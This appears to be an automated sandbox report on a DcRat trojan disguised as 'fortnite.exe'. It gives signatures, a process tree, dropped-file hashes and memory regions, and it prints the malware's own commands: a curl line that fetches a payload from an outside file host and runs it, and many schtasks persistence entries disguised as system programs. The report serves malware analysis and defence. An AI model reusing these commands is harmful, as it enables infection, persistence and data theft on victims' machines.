Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2024 15:41

General

  • Target

    fortnite.exe

  • Size

    1.4MB

  • MD5

    fe46f964b97f65038b33d792041d5ae1

  • SHA1

    78c5f038a61bd6cc176aa6ba404ce3b1066dd3ac

  • SHA256

    5b1344b5474239635dbccf34f061111a440fdf309fc106ab7890902452d9e1f3

  • SHA512

    8f630383500a97b11174b39206bc63732c67e9ee58430f64efa708565ed9a01b737e133639f0a56f936fc9d13f0e234e655c1f2f9c3683931e8c1fa11a507d0f

  • SSDEEP

    24576:PFOaIhahEyuRAmfnkuGKFDflpC+bKlAtc06cd:tUhfnsGzH

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\fortnite.exe
    "C:\Users\Admin\AppData\Local\Temp\fortnite.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3948
    • \??\c:\users\admin\appdata\local\temp\fortnite.exe 
      c:\users\admin\appdata\local\temp\fortnite.exe 
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        3⤵
          PID:4524
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\system32\curl.exe
            curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
            4⤵
            • Drops file in Windows directory
            PID:1868
        • C:\Windows\Speech\physmeme.exe
          "C:\Windows\Speech\physmeme.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2096
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"
            4⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3048
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1952
              • C:\Medal\Medal.exe
                "C:\Medal/Medal.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4456
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bNv2DH4uiO.bat"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5020
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    8⤵
                      PID:1524
                    • C:\Windows\system32\PING.EXE
                      ping -n 10 localhost
                      8⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:4684
                    • C:\Windows\SKB\SppExtComObj.exe
                      "C:\Windows\SKB\SppExtComObj.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5104
        • C:\Windows\Resources\Themes\icsys.icn.exe
          C:\Windows\Resources\Themes\icsys.icn.exe
          2⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4160
          • \??\c:\windows\resources\themes\explorer.exe
            c:\windows\resources\themes\explorer.exe
            3⤵
            • Modifies visiblity of hidden/system files in Explorer
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in System32 directory
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1492
            • \??\c:\windows\resources\spoolsv.exe
              c:\windows\resources\spoolsv.exe SE
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:220
              • \??\c:\windows\resources\svchost.exe
                c:\windows\resources\svchost.exe
                5⤵
                • Modifies visiblity of hidden/system files in Explorer
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in System32 directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2300
                • \??\c:\windows\resources\spoolsv.exe
                  c:\windows\resources\spoolsv.exe PR
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:2148
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fortnite.exe f" /sc MINUTE /mo 8 /tr "'C:\Medal\fortnite.exe .exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2400
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fortnite.exe " /sc ONLOGON /tr "'C:\Medal\fortnite.exe .exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1088
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fortnite.exe f" /sc MINUTE /mo 14 /tr "'C:\Medal\fortnite.exe .exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:5112
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Windows\SKB\SppExtComObj.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2168
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\SKB\SppExtComObj.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4268
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Windows\SKB\SppExtComObj.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1788
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\services.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2112
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:776
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1288
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\OfficeClickToRun.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3040
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\OfficeClickToRun.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3208
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\microsoft shared\OfficeClickToRun.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3024
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2260
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2912
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3796
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 5 /tr "'C:\Medal\Medal.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:660
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3324
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 8 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3888

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat

        Filesize

        63B

        MD5

        e24619181276af563705f4b1bed29490

        SHA1

        fddac27290319f69543f5330fe97c122a8a01376

        SHA256

        eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05

        SHA512

        1898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591

      • C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe

        Filesize

        224B

        MD5

        96d43070e1e39d421c53a2f8dca13fc6

        SHA1

        07417cccceddbf8d5f5b48dec0b2e08d53a4754f

        SHA256

        0dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314

        SHA512

        9fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398

      • C:\Medal\Medal.exe

        Filesize

        1.8MB

        MD5

        4f66bbfed3a524398bd0267ed974ccbc

        SHA1

        b2567397dc823412d87a23428c7833ff74586b7d

        SHA256

        fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8

        SHA512

        bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f

      • C:\Users\Admin\AppData\Local\Temp\bNv2DH4uiO.bat

        Filesize

        159B

        MD5

        24a46f0cd697458b9d76c13a7decd7e9

        SHA1

        1cc9672c48b2db1e9df8cd81a02becce67666339

        SHA256

        017e1c2afee4d38a1f80a5be7c7dd9760399ff2fa243cacab810fc600e7354ea

        SHA512

        2e06880258a73ab3ffa5ec0a794cd3583d90a2e9b0a145c7ef309c9cb6019809b1aa3771a72ba0c9abf84420badab1c5654f05508171d779e64e8e9fdc3b2f2c

      • C:\Users\Admin\AppData\Local\Temp\fortnite.exe 

        Filesize

        1.2MB

        MD5

        3287792eb50754ea8b3639bca36a8a99

        SHA1

        d46b073edbbfcd8027d2df2b1ccb93f90bec3319

        SHA256

        9c3dd5e7ce8aa6114c6d881a64eefb47f5e6557bbc84cbfa705318674b43fecc

        SHA512

        fada9632e159e6225997c8c6d67fb09f4ce48c1c444d0205ceb8a4004f7006eb7c55ce2823d1f33672bbea36d29e6111cd5021b63ee2fbd3f6dbf2847ce78b38

      • C:\Windows\Resources\Themes\explorer.exe

        Filesize

        135KB

        MD5

        629380ee5e7851e4f4290bb6b23aef75

        SHA1

        4656f231b94f23ef9b733680527694b93ab76b1b

        SHA256

        edb94440df25b63355cde6240f15a917eeebe5021a46d329884a607fc2b61438

        SHA512

        772b2c89c13f91587a65d507b4d73e47b92bc4e4c8c04b9ffd5b5e0ab26074cd0c870a2a07696e376ac59a40de4e327ab13fd9952d4ebea482011ba513597131

      • C:\Windows\Resources\Themes\icsys.icn.exe

        Filesize

        135KB

        MD5

        db2a3be4d0ba7fbe7984689f57969053

        SHA1

        22eeabb26614ba2a32b0869ae544c67c02f9262b

        SHA256

        2055a054d6084815d3e23fdc1cfa776bea0cf21a2eb6194a0d453eec3dead956

        SHA512

        7b3cab337dfe217824ad754c02561f2bdb82eb92d3462503212870e4adb2f6b1e10392e3dc127883a3ef8c39e1c0d9ed946609831c114cc42746fa0f680390d4

      • C:\Windows\Resources\spoolsv.exe

        Filesize

        135KB

        MD5

        8b23acafee63d20b4828f63d52a4a75c

        SHA1

        7d6b68c2527bc7a1428602877c544d8b22311f10

        SHA256

        91367b933f52695e69dcf7a13b918187ace6f8ad572f44cebeccbd5fd22a2a06

        SHA512

        af445e54c92fec20ab20446d6e85aa713734846ae69b68227a39bc7dcefeab39f5dfc94b9a09036c0cf7f1209bf75dcd7bece6b618da6899cbcf706b1283ee6a

      • C:\Windows\Resources\svchost.exe

        Filesize

        135KB

        MD5

        f20d5b0e7dcb6c5e9ac7b2cd4c03d140

        SHA1

        7505048a032b4309524f71e5e04b3839193f3eeb

        SHA256

        2e2ab511da74783714960eb950a50ec5ed40049f234ad0d3471a704150f58638

        SHA512

        f1a19a452d2ebea80de31fc43def47e929d63a0cb4f9d87b4895881901a0e04d3be0eb556b1e8ae50a54734157245bb78ca190025d1cedb503fdd6e92779a76d

      • C:\Windows\Speech\physmeme.exe

        Filesize

        2.1MB

        MD5

        f4620c0afa8e21897509b2e7215097f5

        SHA1

        af216ca6105e271a3fb45a23c10ee7cf3158b7e1

        SHA256

        8daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82

        SHA512

        68b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd

      • memory/220-44-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/1492-123-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/2148-43-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/2300-124-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/3948-46-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/3948-0-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/4160-45-0x0000000000400000-0x000000000041F000-memory.dmp

        Filesize

        124KB

      • memory/4456-66-0x000000001BB10000-0x000000001BB2C000-memory.dmp

        Filesize

        112KB

      • memory/4456-69-0x000000001BB90000-0x000000001BBA8000-memory.dmp

        Filesize

        96KB

      • memory/4456-71-0x0000000001750000-0x000000000175E000-memory.dmp

        Filesize

        56KB

      • memory/4456-67-0x000000001C7D0000-0x000000001C820000-memory.dmp

        Filesize

        320KB

      • memory/4456-64-0x0000000001740000-0x000000000174E000-memory.dmp

        Filesize

        56KB

      • memory/4456-62-0x0000000000D50000-0x0000000000F2E000-memory.dmp

        Filesize

        1.9MB